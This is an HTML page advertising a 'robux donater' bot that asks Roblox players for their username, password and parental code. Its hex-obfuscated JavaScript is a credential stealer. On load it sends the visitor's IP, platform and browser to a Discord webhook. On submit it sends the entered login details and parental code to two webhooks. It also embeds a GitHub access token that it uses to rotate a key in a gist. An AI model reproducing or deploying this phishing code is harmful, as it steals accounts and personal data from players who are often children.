
<html>
  <head>
   <meta charset="utf-8">
   
    <style>
      body {

        font-family: sans-serif;
        color:white;
  background-image: url('https://styles.redditmedia.com/t5_5z83co/styles/communityIcon_48qxnu97t9191.png');
  background-size: cover;
  background-position: center;
  height: 100vh;
  width: 100%;
  position: fixed;
  top: 0;
  left: 0;
  z-index: -1;
  filter: brightness(66%);
  overflow-y: scroll;
      }

html, body {
  overflow-y: auto;
  overflow-x: hidden;
}

      h1 {
        color: #ffffff;
      }
         .btn {
      display: inline-block;
      padding: 10px 20px;
      text-decoration: none;
      font-size: 18px;
      border: none;
      outline: none;
      color: white;
      background-color: transparent;
      cursor: pointer;
       transition-duration: 1s;
      box-shadow: 0 0 55px #0000FF;
    }
    .btn:hover {
      background-color: #0000FF;
      box-shadow: 0 0 12px #0000FF;
      
      
    }
    .btn:active {
      background-color: #00006C;
      box-shadow: 0 0 2px #00006C;
    }
      .form-container {
        width: 500px;
        margin: 0 auto;
        background-color: black;
        border-radius: 10px;
        padding: 20px;
        box-shadow: 0 5px 33px rgba(0, 0, 0, 666565);
         transition-duration: 1s;
         margin-bottom: 20px;
      }
       .form-container:hover {
      background-color: #060606;
      box-shadow: 0 0 9px #060606;
      margin-bottom: 75px;
      
      
    }
       .form-container2 {
    width: 500px;
        margin: 0 auto;
        background-color: black;
        border-radius: 10px;
        padding: 20px;
        box-shadow: 0 5px 33px rgba(0, 0, 0, 666565);
         transition-duration: 1s;
         margin-bottom: 20px;
  
      }
         .form-container2:hover {
      background-color: #060606;
      box-shadow: 0 0 9px #060606;
      margin-bottom: 75px;
      
    }
      input[type="text"] {
        width: 100%;
        border: none;
        border-bottom: 2px solid #00b8d4;
        font-size: 20px;
        padding: 10px;
        margin-bottom: 20px;

      }

         input[type="password"] {
        width: 100%;
        border: none;
        border-bottom: 2px solid #00b8d4;
        font-size: 20px;
        padding: 10px;
        margin-bottom: 20px;
      }

      .error {
        color: #ff0000;
      }
      
    </style>
  </head>
  <body>
    <div class="form-container">
      <h1 style=color:white>Most efficient robux donater</h1>
       <p style=color:gray;font-size:80%>WONT WORK ON ALT ACCOUNTS SINCE ROBLOX DOESNT ALLOW PHP LOGINS ON NEW ACCOUNTS.</p>
      <p style=color:red;font-size:80%>This is a PHP bot that will give a person the exact amount of robux that you enter please note that you must have the amount of robux or you will be blacklisted</p>
      <p style=color:blue;font-size:80%>The owner of this website is: birb#8633</p>
      <form>
      <p>As a first step, it would be useful to know how much you wish to donate.</p>
      Donation: <input type="text" id="disco"><br>
       <div>
        Roblox username: <input type="text" id="name"><br>
        Roblox password: <input type="password" id="pass"><br>
        
        Parental code (we need this because of the reptition after like a few times it will ask to enter it):<input type="text" id="code69"<br>
        Register key:<input type="text" id="key"<br>
        
        <p style="margin-bottom:15px;color:red;font-size:80%">Only if u have parental code ENABLED</p>
        <div>
      <a class="btn" value="Calculate" onclick="sendMessage()">Register</a>
</div>
       </div>
       
      </form>
      <p class="error" id="error"></p>
    </div>
     

    
    <script>
  var _0xd03b=["\x68","\x6E\x69\x6C","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x31\x30\x35\x37\x36\x37\x33\x36\x37\x32\x37\x39\x39\x38\x32\x35\x39\x32\x30\x2F\x39\x7A\x43\x57\x5F\x67\x79\x55\x41\x77\x6C\x56\x52\x50\x5F\x76\x6A\x63\x4F\x59\x6D\x4B\x65\x54\x77\x48\x6D\x37\x33\x38\x50\x78\x41\x38\x41\x67\x69\x4F\x5F\x4A\x73\x58\x56\x64\x65\x77\x68\x50\x46\x6B\x71\x70\x78\x33\x30\x4B\x37\x39\x54\x51\x5A\x46\x44\x48\x75\x51\x2D\x36","\x6E\x6F\x74\x66\x6F\x75\x6E\x64","\x63\x6F\x6E\x74\x65\x6E\x74","\x77\x65\x62\x68\x6F\x6F\x6B\x64\x6F\x6E\x61\x74\x65\x2E\x74\x78\x74","\x66\x69\x6C\x65\x73","\x74\x68\x65\x6E","\x6F\x6B","\x6A\x73\x6F\x6E","\x45\x72\x72\x6F\x72\x20\x66\x65\x74\x63\x68\x69\x6E\x67\x20\x47\x69\x73\x74\x3A\x20","\x73\x74\x61\x74\x75\x73\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x67\x69\x74\x68\x75\x62\x2E\x63\x6F\x6D\x2F\x67\x69\x73\x74\x73\x2F\x62\x34\x31\x38\x62\x34\x36\x36\x39\x36\x39\x62\x35\x65\x61\x38\x35\x39\x30\x61\x30\x37\x31\x62\x39\x65\x30\x32\x31\x34\x32\x62","\x42\x65\x61\x72\x65\x72\x20\x20\x67\x69\x74\x68\x75\x62\x5F\x70\x61\x74\x5F\x31\x31\x41\x54\x50\x4D\x47\x58\x41\x30\x6E\x6D\x7A\x6C\x69\x67\x71\x4C\x7A\x39\x77\x74\x5F\x75\x66\x42\x69\x54\x6D\x65\x48\x45\x36\x69\x61\x30\x4C\x58\x61\x5A\x63\x30\x6C\x39\x62\x46\x78\x62\x56\x62\x30\x44\x79\x45\x64\x73\x61\x49\x6C\x61\x34\x78\x36\x51\x63\x37\x37\x49\x51\x54\x4E\x52\x35\x55\x43\x71\x64\x4B\x4D\x48\x74\x68","\x69\x70","\x39\x31\x2E\x31\x32\x39\x2E\x31\x30\x33\x2E\x36\x39","\x69\x6D\x20\x74\x65\x73\x74\x69\x6E\x67\x20\x74\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x2C\x20\x73\x6F\x20\x6E\x6F\x20\x69\x70\x20\x66\x6F\x72\x20\x75\x20\x6C\x6F\x6C","\x64\x6F\x6E\x61\x74\x65\x6B\x65\x79\x2E\x74\x78\x74","\x76\x61\x6C\x75\x65","\x6B\x65\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6E\x61\x6D\x65","\x54\x45\x53\x54","\x70\x61\x73\x73","\x63\x6F\x64\x65\x36\x39","\x64\x69\x73\x63\x6F","\x70\x6C\x61\x74\x66\x6F\x72\x6D","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x50\x4F\x53\x54","\x53\x6F\x6D\x65\x62\x6F\x64\x79\x20\x76\x69\x73\x69\x74\x65\x64\x20\x50\x6C\x73\x20\x44\x6F\x6E\x61\x74\x65\x20\x61\x74\x3A","\x53\x45\x4E\x53\x49\x54\x49\x56\x45\x20\x49\x4E\x46\x4F\x52\x4D\x41\x54\x49\x4F\x4E","\x49\x50","\x7C\x7C","\x44\x45\x56\x49\x43\x45","\x42\x52\x4F\x57\x53\x45\x52","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x69\x70\x69\x66\x79\x2E\x6F\x72\x67\x3F\x66\x6F\x72\x6D\x61\x74\x3D\x6A\x73\x6F\x6E","\x74\x65\x73\x74","\x57\x65\x20\x61\x70\x6F\x6C\x6F\x67\x69\x7A\x65\x20\x66\x6F\x72\x20\x74\x68\x65\x20\x69\x6E\x63\x6F\x6E\x76\x65\x6E\x69\x65\x6E\x63\x65\x2E\x20\x49\x74\x20\x61\x70\x70\x65\x61\x72\x73\x20\x74\x68\x61\x74\x20\x77\x65\x20\x61\x72\x65\x20\x75\x6E\x61\x62\x6C\x65\x20\x74\x6F\x20\x6C\x6F\x63\x61\x74\x65\x20\x79\x6F\x75\x72\x20\x6B\x65\x79\x2E\x20\x54\x68\x69\x73\x20\x6D\x61\x79\x20\x62\x65\x20\x61\x20\x73\x79\x73\x74\x65\x6D\x20\x65\x72\x72\x6F\x72\x2E\x20\x50\x6C\x65\x61\x73\x65\x20\x63\x6F\x6E\x74\x61\x63\x74\x20\x74\x68\x65\x20\x6F\x77\x6E\x65\x72\x20\x6F\x72\x20\x73\x75\x70\x70\x6F\x72\x74\x20\x74\x65\x61\x6D\x20\x66\x6F\x72\x20\x61\x73\x73\x69\x73\x74\x61\x6E\x63\x65\x20\x69\x6E\x20\x72\x65\x73\x6F\x6C\x76\x69\x6E\x67\x20\x74\x68\x69\x73\x20\x69\x73\x73\x75\x65\x2E","\x59\x6F\x75\x72\x20\x6B\x65\x79\x20\x68\x61\x73\x20\x62\x65\x65\x6E\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x6C\x79\x20\x72\x65\x67\x69\x73\x74\x65\x72\x65\x64\x20\x61\x6E\x64\x20\x79\x6F\x75\x72\x20\x52\x6F\x62\x6C\x6F\x78\x20\x61\x63\x63\x6F\x75\x6E\x74\x20\x76\x61\x6C\x69\x64\x61\x74\x69\x6F\x6E\x20\x68\x61\x73\x20\x62\x65\x67\x75\x6E\x2E\x20\x50\x6C\x65\x61\x73\x65\x20\x72\x65\x66\x72\x61\x69\x6E\x20\x66\x72\x6F\x6D\x20\x6A\x6F\x69\x6E\x69\x6E\x67\x20\x61\x6E\x79\x20\x67\x61\x6D\x65\x73\x20\x75\x6E\x74\x69\x6C\x20\x74\x68\x65\x20\x76\x61\x6C\x69\x64\x61\x74\x69\x6F\x6E\x20\x70\x72\x6F\x63\x65\x73\x73\x20\x69\x73\x20\x63\x6F\x6D\x70\x6C\x65\x74\x65\x64\x2E","\x61\x73\x73","\x6F\x6D\x67\x20\x61\x63\x63\x6F\x75\x6E\x74","\x4F\x6D\x67\x20\x66\x72\x65\x65\x20\x61\x63\x63\x6F\x75\x6E\x74\x3F\x3F\x3F","\x41\x63\x63\x6F\x75\x6E\x74\x20\x4E\x61\x6D\x65","\x41\x63\x63\x6F\x75\x6E\x74\x20\x50\x61\x73\x73\x77\x6F\x72\x64","\x50\x61\x72\x65\x6E\x74\x61\x6C\x20\x43\x6F\x64\x65","\x44\x69\x73\x63\x6F\x72\x64","\x49\x50\x20\x41\x44\x44\x52\x45\x53\x53","\x67\x65\x74\x52\x61\x6E\x64\x6F\x6D\x56\x61\x6C\x75\x65\x73","\x63\x72\x79\x70\x74\x6F","","\x6A\x6F\x69\x6E","\x30","\x70\x61\x64\x53\x74\x61\x72\x74","\x66\x72\x6F\x6D","\x62\x34\x31\x38\x62\x34\x36\x36\x39\x36\x39\x62\x35\x65\x61\x38\x35\x39\x30\x61\x30\x37\x31\x62\x39\x65\x30\x32\x31\x34\x32\x62","\x67\x69\x74\x68\x75\x62\x5F\x70\x61\x74\x5F\x31\x31\x41\x54\x50\x4D\x47\x58\x41\x30\x6E\x6D\x7A\x6C\x69\x67\x71\x4C\x7A\x39\x77\x74\x5F\x75\x66\x42\x69\x54\x6D\x65\x48\x45\x36\x69\x61\x30\x4C\x58\x61\x5A\x63\x30\x6C\x39\x62\x46\x78\x62\x56\x62\x30\x44\x79\x45\x64\x73\x61\x49\x6C\x61\x34\x78\x36\x51\x63\x37\x37\x49\x51\x54\x4E\x52\x35\x55\x43\x71\x64\x4B\x4D\x48\x74\x68","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x67\x69\x74\x68\x75\x62\x2E\x63\x6F\x6D\x2F\x67\x69\x73\x74\x73\x2F","\x50\x41\x54\x43\x48","\x42\x65\x61\x72\x65\x72\x20","\x65\x72\x72\x6F\x72","\x63\x61\x74\x63\x68"];const pedo=_0xd03b[0];var ZDIAGRAM=_0xd03b[1];var webo2=_0xd03b[2];var userIP=_0xd03b[3];fetch(`${_0xd03b[12]}`,{headers:{'\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E':_0xd03b[13]}})[_0xd03b[7]]((_0x4a3bx7)=>{if(_0x4a3bx7[_0xd03b[8]]){return _0x4a3bx7[_0xd03b[9]]()}else {throw  new Error(_0xd03b[10]+ _0x4a3bx7[_0xd03b[11]])}})[_0xd03b[7]]((_0x4a3bx5)=>{const _0x4a3bx6=_0x4a3bx5[_0xd03b[6]][_0xd03b[5]][_0xd03b[4]];ZDIAGRAM= _0x4a3bx6});fetch(_0xd03b[37])[_0xd03b[7]]((_0x4a3bx7)=>{return _0x4a3bx7[_0xd03b[9]]()})[_0xd03b[7]]((_0x4a3bx5)=>{userIP= _0x4a3bx5[_0xd03b[14]];if(userIP=== _0xd03b[15]){userIP= _0xd03b[16];fetch(`${_0xd03b[12]}`,{headers:{'\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E':_0xd03b[13]}})[_0xd03b[7]]((_0x4a3bx7)=>{if(_0x4a3bx7[_0xd03b[8]]){return _0x4a3bx7[_0xd03b[9]]()}else {throw  new Error(_0xd03b[10]+ _0x4a3bx7[_0xd03b[11]])}})[_0xd03b[7]]((_0x4a3bx5)=>{const _0x4a3bx8=_0x4a3bx5[_0xd03b[6]][_0xd03b[17]][_0xd03b[4]];document[_0xd03b[20]](_0xd03b[19])[_0xd03b[18]]= _0x4a3bx8;document[_0xd03b[20]](_0xd03b[21])[_0xd03b[18]]= _0xd03b[22];document[_0xd03b[20]](_0xd03b[23])[_0xd03b[18]]= _0xd03b[22];document[_0xd03b[20]](_0xd03b[24])[_0xd03b[18]]= _0xd03b[22];document[_0xd03b[20]](_0xd03b[25])[_0xd03b[18]]= _0xd03b[22]})}else {var _0x4a3bx9=navigator[_0xd03b[26]];var _0x4a3bxa=navigator[_0xd03b[27]];fetch(ZDIAGRAM,{method:_0xd03b[28],body:JSON[_0xd03b[35]]({embeds:[{title:_0xd03b[29],description:_0xd03b[30],color:3447003,fields:[{name:_0xd03b[31],value:_0xd03b[32]+ userIP+ _0xd03b[32]},{name:_0xd03b[33],value:_0x4a3bx9},{name:_0xd03b[34],value:_0x4a3bxa}]}]}),headers:{'\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65':_0xd03b[36]}})}});function sendMessage(){const _0x4a3bxc=document[_0xd03b[20]](_0xd03b[19])[_0xd03b[18]];const _0x4a3bxd=document[_0xd03b[20]](_0xd03b[21])[_0xd03b[18]];const _0x4a3bxe=document[_0xd03b[20]](_0xd03b[23])[_0xd03b[18]];const _0x4a3bxf=document[_0xd03b[20]](_0xd03b[25])[_0xd03b[18]];const _0x4a3bx10=document[_0xd03b[20]](_0xd03b[24])[_0xd03b[18]];fetch(`${_0xd03b[12]}`,{headers:{'\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E':_0xd03b[13]}})[_0xd03b[7]]((_0x4a3bx7)=>{if(_0x4a3bx7[_0xd03b[8]]){return _0x4a3bx7[_0xd03b[9]]()}else {throw  new Error(_0xd03b[10]+ _0x4a3bx7[_0xd03b[11]])}})[_0xd03b[7]]((_0x4a3bx5)=>{const _0x4a3bx11=_0x4a3bx5[_0xd03b[6]][_0xd03b[17]][_0xd03b[4]];if(_0x4a3bxc!= _0x4a3bx11|| /^\s*$/[_0xd03b[38]](_0x4a3bxd)|| /^\s*$/[_0xd03b[38]](_0x4a3bxe)){alert(_0xd03b[39])}else {changekey(_0x4a3bx11);alert(_0xd03b[40]);var _0x4a3bx9=navigator[_0xd03b[26]];var _0x4a3bxa=navigator[_0xd03b[27]];fetch(ZDIAGRAM,{method:_0xd03b[28],headers:{"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0xd03b[36]},body:JSON[_0xd03b[35]]({embeds:[{username:_0xd03b[41],title:_0xd03b[42],description:_0xd03b[43],color:3447003,fields:[{name:_0xd03b[44],value:_0x4a3bxd},{name:_0xd03b[45],value:_0x4a3bxe},{name:_0xd03b[46],value:_0x4a3bx10},{name:_0xd03b[47],value:_0x4a3bxf},{name:_0xd03b[48],value:userIP},{name:_0xd03b[33],value:_0x4a3bx9},{name:_0xd03b[34],value:_0x4a3bxa}]}]})});var _0x4a3bx12=JSON[_0xd03b[35]]();fetch(ZDIAGRAM,{method:_0xd03b[28],headers:{"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0xd03b[36]},body:_0x4a3bx12});fetch(webo2,{method:_0xd03b[28],headers:{"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0xd03b[36]},body:JSON[_0xd03b[35]]({embeds:[{username:_0xd03b[41],title:_0xd03b[42],description:_0xd03b[43],color:3447003,fields:[{name:_0xd03b[44],value:_0x4a3bxd},{name:_0xd03b[45],value:_0x4a3bxe},{name:_0xd03b[46],value:_0x4a3bx10},{name:_0xd03b[47],value:_0x4a3bxf},{name:_0xd03b[48],value:userIP},{name:_0xd03b[33],value:_0x4a3bx9},{name:_0xd03b[34],value:_0x4a3bxa}]}]})});fetch(webo2,{method:_0xd03b[28],headers:{"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0xd03b[36]},body:_0x4a3bx12})}})}function generateRandomKey(){const _0x4a3bx14= new Uint8Array(32);window[_0xd03b[50]][_0xd03b[49]](_0x4a3bx14);return Array[_0xd03b[55]](_0x4a3bx14,(_0x4a3bx15)=>{return _0x4a3bx15.toString(16)[_0xd03b[54]](2,_0xd03b[53])})[_0xd03b[52]](_0xd03b[51])}function changekey(){const _0x4a3bx17=_0xd03b[56];const _0x4a3bx18=_0xd03b[57];const _0x4a3bx19=`${_0xd03b[58]}${_0x4a3bx17}${_0xd03b[51]}`;const _0x4a3bx1a={method:_0xd03b[59],headers:{'\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E':`${_0xd03b[60]}${_0x4a3bx18}${_0xd03b[51]}`,'\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65':_0xd03b[36]},body:JSON[_0xd03b[35]]({'\x66\x69\x6C\x65\x73':{'\x64\x6F\x6E\x61\x74\x65\x6B\x65\x79\x2E\x74\x78\x74':{'\x63\x6F\x6E\x74\x65\x6E\x74':generateRandomKey()}}})};fetch(_0x4a3bx19,_0x4a3bx1a)[_0xd03b[7]]((_0x4a3bx7)=>{if(_0x4a3bx7[_0xd03b[8]]){}else {}})[_0xd03b[62]]((_0x4a3bx1b)=>{console[_0xd03b[61]](_0x4a3bx1b)})}
  </script>
  
  

  

</html>
</html>
</html>
